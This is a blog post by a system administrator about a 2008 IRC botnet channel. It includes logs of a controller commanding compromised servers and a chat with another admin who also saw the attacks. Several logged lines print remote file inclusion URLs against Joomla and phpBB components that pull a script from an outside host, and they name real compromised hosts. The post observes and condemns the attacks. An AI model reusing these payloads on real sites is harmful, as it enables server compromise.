Jul 08 20:06:28 *    [A]k0d0920 has quit (Ping timeout)
Jul 08 20:07:03 *    Azimuth gives voice to [A]k0d7586 [A]k0d8918
Jul 08 20:08:34 *    [A]k0d1789 (~k0d1704@OltreIrc-AB2C89C9.ev.vnu.edu.tw) has joined ##cinestar
Jul 08 20:09:08 <[A]k0d4880>    [info]: Linux fruela 2.6.15-52-386 #1 PREEMPT Mon Jun 9 17:24:46 UTC 2008 i686 (safe: off)
Jul 08 20:09:08 <[A]k0d4880>    [vuln]: http://www.moterosastures.es//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.diving-thailand-phuket.com/echo.txt??
Jul 08 20:09:30 *    Azimuth gives voice to [A]k0d1789
Jul 08 20:09:54 <Azimuth>    .user tic
Jul 08 20:09:54 -[A]k0d7586/##cinestar-    [Auth]: Senha errada Azimuth idiota!!
Jul 08 20:09:59 <Azimuth>    .user plz
Jul 08 20:10:03 <Azimuth>    .user net
Jul 08 20:10:06 <Azimuth>    .raw join ##kbyte
Jul 08 20:10:29 <[A]k0d1789>    [info]: Windows NT EVBBS 5.1 build 2600 (safe: off)
Jul 08 20:10:30 <[A]k0d1789>    [vuln]: http://bbs.ev.vnu.edu.tw/phpbb2/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
Jul 08 20:11:40 <Azimuth>    [A]k0d2888 .info
Jul 08 20:11:52 <Azimuth>    .user rdh
Jul 08 20:11:56 <Azimuth>    .user net
Jul 08 20:12:00 <Azimuth>    .user plz
Jul 08 20:12:02 <Azimuth>    .user tic
Jul 08 20:12:22 <Azimuth>    [A]k0d2888 .info
Jul 08 20:12:27 <Azimuth>    [A]k0d2888 .die
Jul 08 20:12:35 *    Azimuth sets ban on *!*@FF22E601.C1DCD0DB.CCB009B8.IP
Jul 08 20:12:42 *    Azimuth has kicked [A]k0d2888 from ##cinestar (Azimuth)
Jul 08 20:13:20 <Azimuth>    [A]k0d7586 .info
Jul 08 20:15:09 *    [A]k0d7586 has quit (Ping timeout)
Jul 08 20:19:31 <Azimuth>    .uname
Jul 08 20:19:31 <[A]k0d9931>    [info]: Linux www29.celeonet.fr 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d9886>    [info]: Linux web2-sh 2.6.15-51-386 #1 PREEMPT Thu Dec 6 20:20:49 UTC 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d5821>    [info]: Linux unicon02 2.6.11.9-050512a #1 SMP Thu May 12 20:53:02 CEST 2005 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d0577>    [info]: Linux central.bearlounge.net 2.6.9-55.0.12.ELsmp #1 SMP Fri Nov 2 11:19:08 EDT 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d9618>    [info]: FreeBSD gkvcyclingteam.org 6.3-STABLE FreeBSD 6.3-STABLE #2: Mon Jun  9 03:18:45 CEST 2008     root@dione.ispsystem.net:/root/src/sys/i386/compile/ISPSYSTEM_PAE i386 (safe: off)
Jul 08 20:19:31 <[A]k0d3702>    [info]: Windows NT WEBSERVER2000 5.0 build 2195 (safe: off)
Jul 08 20:19:31 <[A]k0d8826>    [info]: Linux crf.ecritel.net 2.4.31 #1 SMP Wed Aug 3 14:42:21 CEST 2005 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d4001>    [info]: FreeBSD server.brightlightmedia.co.uk 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Sun May  7 04:42:56 UTC 2006     root@opus.cse.buffalo.edu:/usr/obj/usr/src/sys/SMP i386 (safe: off)
Jul 08 20:19:31 <[A]k0d0908>    [info]: Linux europe03.puhtek.com 2.6.9-55.0.2.ELsmp #1 SMP Tue Jun 26 14:30:58 EDT 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d8918>    [info]: FreeBSD dl380.hppc.co.uk 6.0-RELEASE FreeBSD 6.0-RELEASE #0: Thu Nov  3 09:36:13 UTC 2005     root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386 (safe: off)
Jul 08 20:19:31 <[A]k0d7913>    [info]: Linux ISICHt 2.4.32 #1 Thu Nov 17 20:24:16 CET 2005 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d5534>    [info]: FreeBSD ns2.chmr.ru 6.0-RELEASE FreeBSD 6.0-RELEASE #0: Thu Nov  3 09:36:13 UTC 2005     root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386 (safe: off)
Jul 08 20:19:31 <[A]k0d7027>    [info]: Linux evadne.site5.com 2.6.9-67.0.15.ELsmp #1 SMP Thu May 8 10:52:19 EDT 2008 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d4880>    [info]: Linux fruela 2.6.15-52-386 #1 PREEMPT Mon Jun 9 17:24:46 UTC 2008 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d6126>    [info]: Windows NT TOMKORPWEB 5.1 build 2600 (safe: off)
Jul 08 20:19:31 <[A]k0d8109>    [info]: Linux host.queo.com.mx 2.6.18-92.1.6.el5 #1 SMP Wed Jun 25 13:49:24 EDT 2008 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d3180>    [info]: Linux beast.colnetwork.com 2.6.18-53.el5PAE #1 SMP Wed Oct 10 16:48:18 EDT 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d7746>    [info]: Linux vps.theleftorium.com 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d0825>    [info]: Linux server10.proaxxs.net 2.6.9-67.0.15.ELsmp #1 SMP Thu May 8 10:52:19 EDT 2008 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d7677>    [info]: Linux server.doralhosting.net 2.6.9-55.ELsmp #1 SMP Wed May 2 14:28:44 EDT 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d8421>    [info]: Darwin LT.Web.Server 9.4.0 Darwin Kernel Version 9.4.0: Mon Jun  9 19:30:53 PDT 2008; root:xnu-1228.5.20~1/RELEASE_I386 i386 (safe: off)
Jul 08 20:19:31 <[A]k0d4017>    [info]: Windows NT BAAL 5.2 build 3790 (safe: off)
Jul 08 20:19:31 <[A]k0d5564>    [info]: Windows NT SERVER 5.0 build 2195 (safe: off)
Jul 08 20:19:31 <[A]k0d1789>    [info]: Windows NT EVBBS 5.1 build 2600 (safe: off)
Jul 08 20:19:31 <[A]k0d8278>    [info]: Linux ns91.badanet.co.kr 2.4.20-43.9.legacysmp #1 SMP Sat Apr 30 19:07:33 EDT 2005 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d4804>    [info]: Windows NT SCY-01 5.0 build 2195 (safe: off)
Jul 08 20:19:31 <[A]k0d8908>    [info]: Linux ns91.badanet.co.kr 2.4.20-43.9.legacysmp #1 SMP Sat Apr 30 19:07:33 EDT 2005 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d4455>    [info]: Linux host02.wotonet.com 2.4.36-WOTO080129.V1 #2 SMP Tue Jan 29 12:16:58 KST 2008 i686 (safe: off)
Jul 08 20:19:32 <[A]k0d0943>    [info]: Linux w45.pooding.com 2.4.31-2 #1 SMP Tue Jul 26 17:15:34 KST 2005 i686 (safe: off)
Jul 08 20:20:56 <Azimuth>    .raw join ##kbyte
Jul 08 20:21:04 <Azimuth>    .raw part ##cinestar
Jul 08 20:21:04 *    [A]k0d0908 (~k0d7369@OltreIrc-CE63C3EE.dnayritysnetti.net) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d8826 (~k0d3118@OltreIrc-E3995A08.croix-rouge.fr) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d4001 (~k0d9875@970AFCB4.2F45E854.E340ABB2.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d5821 (~k0d3952@OltreIrc-DC0CB93C.de) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d9886 (~k0d3835@OltreIrc-CECC1CBA.atwork.nl) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d0577 (~k0d6355@OltreIrc-9BBE6E0E.bearlounge.net) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d7913 (~k0d6003@OltreIrc-F23848CF.be) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d8918 (~k0d0497@634CB9B7.EC4A613B.6711F1E0.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d9931 (~k0d4325@OltreIrc-5B50CDF7.celeonet.fr) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d9618 (~k0d3084@OltreIrc-684192CD.org) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d3702 (~k0d2155@OltreIrc-320D8684.afrikanergasse.xdsl-line.inode.at) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d4017 (~k0d6102@FBFD3075.A15CBB26.6D3D4946.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d4880 (~k0d0556@OltreIrc-9790B58D.telecable.es) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d7027 (~k0d1629@OltreIrc-256CCF12.site5.com) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d5534 (~k0d6528@995C4AF2.3E333E34.33EE78D3.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d8109 (~k0d2220@958957D9.99230A91.8B13B0E8.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d8421 (~k0d1756@DB22263.98BBD98C.48892EB1.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d7677 (~k0d4880@OltreIrc-70B26461.net) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d6126 (~k0d4006@OltreIrc-32567AD5.wp.shawcable.net) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d0825 (~k0d6278@OltreIrc-A935EFC.static.reverse.ltdomains.com) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d3180 (~k0d5484@D8D04E5D.AA93C9D.130AD98B.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d7746 (~k0d6619@EE3ACF2A.F0FE8B70.F93FFA4D.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d1789 (~k0d1704@OltreIrc-AB2C89C9.ev.vnu.edu.tw) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d8278 (~k0d1123@7F26F4C3.9717B992.2A42257.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d8908 (~k0d5189@7F26F4C3.9717B992.2A42257.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d0943 (~k0d1303@504C739A.99FFEA55.F7DAF277.IP) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d4455 (~k0d6874@OltreIrc-AD35EFB5.wotonet.com) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d4804 (~k0d6984@OltreIrc-E791C985.adsl.static.ttn.net) has left ##cinestar
Jul 08 20:21:04 *    [A]k0d5564 (~k0d5000@EEE23E15.6157A1E5.1E1D14E7.IP) has left ##cinestar
Jul 08 20:21:23 <Azimuth>    .user plz
**** ENDING LOGGING AT Tue Jul  8 20:21:49 2008

As you noticed above I actually spoke and someone answered me. Not knowing if this was who was responsible for the whole mess I had a small chat with him/her. Logged below for your reading pleasure. Note that I changed nickname to  <[A]k0d3957> at some point in this conversation.

<k0d1237> are you part of this stupid story or are you an admin that just happened to see the logs ?
<[A]k0d5823> No I am not part of this story
<[A]k0d5823> I saw those attempts on my apache logs, and wanted to see, what that script does
<k0d1237> crazy shit init
<k0d1237> ill be posting this somewhere so I can laugh my head off later.
<[A]k0d5823> yep
<[A]k0d5823> but join on ##cinestar
<k0d1237> invite only
<k0d1237> the key doesnt work , the one i found in the script
<[A]k0d5823> but if you put your nick like me, you can come there
* Cannot join ##cinestar (Channel is invite only).
<k0d1237> hmm
<k0d1237> hold on
<[A]k0d3957> better ? <[A]k0d5823> and then join on ##cinestar
<[A]k0d3957> i bet your the guy that did this
<[A]k0d3957> <[A]k0d5823> Nope <[A]k0d3957> Luckily enough I didn’t get compromised <[A]k0d3957> hope you didn’t
<[A]k0d5823> I am running a finnish site that offers how to make differend drinks
<[A]k0d3957> whats the site ?
<[A]k0d5823> and i have a phpbb there
<[A]k0d5823> http://nettibaari.shotti.fi
<[A]k0d5823> entral.bearlounge.net - - [08/Jul/2008:18:29:49 +0300] “GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.diving-thailand-phuket.com/echo.txt?? HTTP/1.1″ 404 402 “-” “Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)”
<[A]k0d5823> +c on the beginning
<[A]k0d5823> Just wondering, where could I report of this…?
<[A]k0d3957> to the police ?
<[A]k0d5823> I just wonder if a finnish police is interested of this
<[A]k0d3957> i wouldnt know
<[A]k0d3957> im just a bot from a hacked server
<[A]k0d3957> <[A]k0d5823> hehe
<[A]k0d3957> im going to be posting this on the net , its quite funny <[A]k0d5823> I wrote to Finnish Communications Regulatory Authority (FICORA) and asked, if they are interested
<[A]k0d5823> at least they now where should I report this
<[A]k0d3957> could you cc me the mail ?
<[A]k0d3957> i might consider reporting this in cyprus too
<[A]k0d5823> I did it already, and wrote it in finnish, so it would not help you much
<[A]k0d3957> oh
<[A]k0d5823> But if they want me to report somewhere else, then i could cc it
<[A]k0d5823> I am just collectin the information of this system
<[A]k0d3957> do a /who ##cinestar and paste it to them
<[A]k0d5823> Yep, I took it already
<[A]k0d5823>  /who * in fact

So in parallel I did join the channel ##kbyte as the guy mentioned. How did he know about kbyte? Strangely enough he possibly couldn’t have unless he was part of it. I got banned from an IRCOp that seemd to be part of this and he/she simply realized that I wasn’t an attack bot. He accomplished this by parting all bots with a .part command which they responded to. When I was busy looking up stuff I didn’t have time to play along and part (and join another channel which they stated) so I was the only “bot” in the channel. Unfortunately they realized this and gave me the boot. The fact that I was G-Lined from this server gives us to believe that the IRCOps are in on it.

Jul 08 20:22:12 *    *** You are permanently banned from OltreIrc (no reason)
Jul 08 20:22:12 *    Closing Link: [A]k0d3957[86-102.netway.com.cy] (User has been permanently banned from OltreIrc (no reason))
Jul 08 20:22:12 *    Disconnected (Remote host closed socket).

Anyhow , from the logs you can conclude that this was script kiddies having some “fun” . I condemnd behavior like this since I administer machines all day long and people that try and mess things up for me aren’t the people going in my good books. In my carrer as a system and network admin I’ve had 1 (one) intrusion and that was on an application layer , in a chroot environment and it wasn’t even something I had setup in the first place.

There isn’t much of anything else to say. If you feel like doing some enumeration and investigation do so , I don’t care and neither do authorities in Cyprus. Never the less it was a painless story and it put a laughing smile on my face this afternoon. I hope the script kiddies in the future become ever so intuitive just so I don’t stop laughing.

I suggest administrators that have had issues like this or are any of the above from the log ; get to work and patch stuff including OS and software since security is a process which must be followed on a higher layer than ethics and religion itself!! If you are unable to maintain security , consider hiring me , or something like me